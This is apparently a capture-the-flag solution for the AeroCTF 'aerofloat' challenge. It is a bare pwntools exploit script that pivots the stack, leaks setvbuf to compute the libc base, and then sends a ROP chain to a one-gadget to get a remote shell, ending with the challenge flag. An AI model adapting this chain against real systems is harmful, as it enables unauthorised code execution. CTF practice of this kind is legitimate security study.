Tags: rop
Rating: 2.0
```python
from pwn import *
#r = process("./aerofloat")
r = remote("tasks.aeroctf.com",33017)
def pd(x):
return str(struct.unpack("d",struct.pack("q",x))[0])
buf = 0x4040C0
r.recvuntil("Enter name: ")
r.send("/bin/sh\x00")
i = 1
while True:
print(i)
if i>11:
break
i+=1
r.sendlineafter("> ","1")
r.sendlineafter("id: ","abcde")
r.sendlineafter("rating: ","123.456")
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p32(0x0)+p32(11))
r.sendlineafter("rating: ","123.456")
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p64(buf))
r.sendlineafter("rating: ",pd(0x4015bb)) #leave ret struct.unpack("d",struct.pack("q",0x4013ed));
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p64(0x404038))
r.sendlineafter("rating: ",pd(0x401030))
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p64(0x4015bb))
r.sendlineafter("rating: ",pd(buf+8))
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p64(0x4015b9))
r.sendlineafter("rating: ",pd(100))
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p64(0x0))
r.sendlineafter("rating: ",pd(0x4014EB))
r.sendlineafter("> ","1")
r.sendlineafter("id: ",p64(0x4013ed))
r.sendlineafter("rating: ",pd(0x4013ed))
#r.sendlineafter("> ","4")
print(r.recvuntil("4. Exit\n> "))
#raw_input("@")
r.sendline("4")
res = r.recv()[:-1]
print(res)
print(len(res))
setvbuf = u64(res.ljust(8,'\x00'))
print(hex(setvbuf))
libc = setvbuf-0x746f0
print(hex(libc))
system = libc+0x46ff0
print(hex(system))
#r.interactive()
rop2 = ''
rop2 += p64(0x4015bb) + p64(buf)
rop2 += p64(libc+0xe664b)
r.send(rop2)
r.interactive()
#Aero{8c911e90f6ff8ecb6a333ebacfccd28b36d1f9b02386cc884b343f1f02da62e6}
```